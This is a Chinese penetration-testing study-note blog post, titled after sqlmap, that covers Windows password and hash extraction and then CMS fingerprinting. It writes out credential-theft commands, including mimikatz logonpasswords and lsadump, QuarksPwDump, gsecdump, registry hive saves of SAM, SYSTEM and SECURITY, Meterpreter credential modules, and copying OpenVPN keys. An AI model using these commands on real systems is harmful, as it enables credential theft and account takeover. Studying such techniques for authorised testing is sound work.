• sqlmap从入门到精通学习笔记(一)


    1.1Windows密码获取与破解

    1.1.1 Windows密码获取思路

    1.通过系统常见漏洞(ms17-010)获取权限,直接使用权限读取密码
    2.获得webshell,进行权限提升,在使用权限获取密码
    3.内网使用NTscan扫描,暴力破解获取系统密码
    4.物理接触获取密码(密码在C:Windowssystem32configsam文件中)

    1.1.2 常见的Windows密码及hash获取工具

    1.gethash

    gethash $local //系统权限下获取本地账号hash值
    

    2.gsecdump

    gsecdump -a //获取本地所有账号哈希值
    

    3.Quarsk PwDump

    QuarksPwDump -dhl   //导出本地hash值
    QuarksPwDump -dhdc  //导出内存中的域控hash值
    QuarksPwDump -dhd   //导出域控hash值,必须指定NTDS文件
    

    4.PwDump
    5.mimakatz

    privilege::debug
    sekurlsa::logonpasswords
    

    6.Windows Credentials Editor(WCE)

    wce -a //获取所有账号的hash值
    

    7.使用REG命令注册表导出文件

    reg save hklmsam sam.hive
    reg save hklmsystem system.hive
    reg save hklmsecurity security.hite
    

    ………………

    1.1.3 物理接触获取密码

    主要是将上述路径(C:Windowssystem32config)中的sam、system、security三个文件拷贝走,通过离线的方式破解密码。
    ……
    3.使用winlogonhack工具记录3389登录密码
    ……
    6.在msf获取反弹的shell上获取密码
    先使用mimikatz前先使用migrate 命令来迁移进程,在执行一下吗命令

    load mimakatz      //加载mimikatz
    kerberos           //获取网络认证协议凭证,其中可能会有明文的账号密码
    msv                //获取msv凭证,其中包含LM和NTLM密码hash值
    wdigest            //获取wdigest(摘要式身份验证)凭证,其中可能会有明文账号密码
    

    7.IIS7配置文件密码读取

    mimikatz.exe privilege::debug log "iis::apphost /in"%systemroot%system32inetsrvconfigapplicationHost.config "/live" exit
    

    8.VPN密码获取

    mimikatz.exe privilege::debug token::elevata lsadump::sam lsadump::secrets exit
    

    9.OpenVPN获取配置及密码
    如果发现安装有Open VPN,可在其安装目录中将config 文件全部复制到本地,重新覆盖后可用保存在本地的key进行登录
    常见安装目录C:\Program FilesOpenVPNconfig
    10.windows下浏览器、E-mail和远程桌面等密码获取工具
    见https://www.cnblogs.com/KHZ521/p/14129057.html
    11.数据库密码获取
    可通过分析网站源代码从数据库配置文件中获取数据库连接信息(如:config、web.config等)
    12.使用Cain、Ettercap等工具进行内网嗅探

    1.1.4 密码hash破解方式

    1.在线破解 推荐网站(https://www.cmd5.com
    2.离线彩虹表破解

    1.5 CMS指纹识别

    1.5.1 指纹识别技术简介及思路

    1.指纹识别技术
    组件是网络空间中最小的单元,web应用程序、数据库、中间件等都属于组件。指纹是组件上能标识对象的一段特征信息,用来在渗透测试信息收集环节中快速识别目标服务。
    2.指纹识别思路
    一般可以通过在线第三方网站和开源程序来进行扫描,也可以结合文件头和反馈信息进行手工判断,指纹识别主要思路如下:

    使用工具自动判断
    在第三方网站进行在线测试
    手工对比文件关键字、版权信息、后台登录路径、程序版本和robos.txt等固有文件进行查找、识别和对比,相同文件具有相同的MD5值或相同的属性

    1.5.2

    1.针对robots.txt文件识别
    2.计算静态文件的MD5值(网站图标、html文件、js文件、images文件、CSS文件等)
    3.请求响应主题内容或头信息匹配
    4.针对url的关键字识别
    5.基于tcp/ip请求协议识别服务指纹
    6.在OWASP中识别web应用框架测试方法
    (1)http头
    (2)Cookie
    (3)HTML源代码
    (4)特殊文件和文件夹

  • 相关阅读:
    JAVA语言基础
    JAVA程序 从命令行接受多个数字,求和之后输出结果
    构建之法阅读笔记02
    软件工程学习进度第三周
    软件工程个人作业02
    安装Linux
    软件工程学习进度
    软件工程个人作业01
    构建之法阅读笔记01
    登录界面
  • 原文地址:https://www.cnblogs.com/KHZ521/p/14370088.html
Copyright © 2020-2023  润新知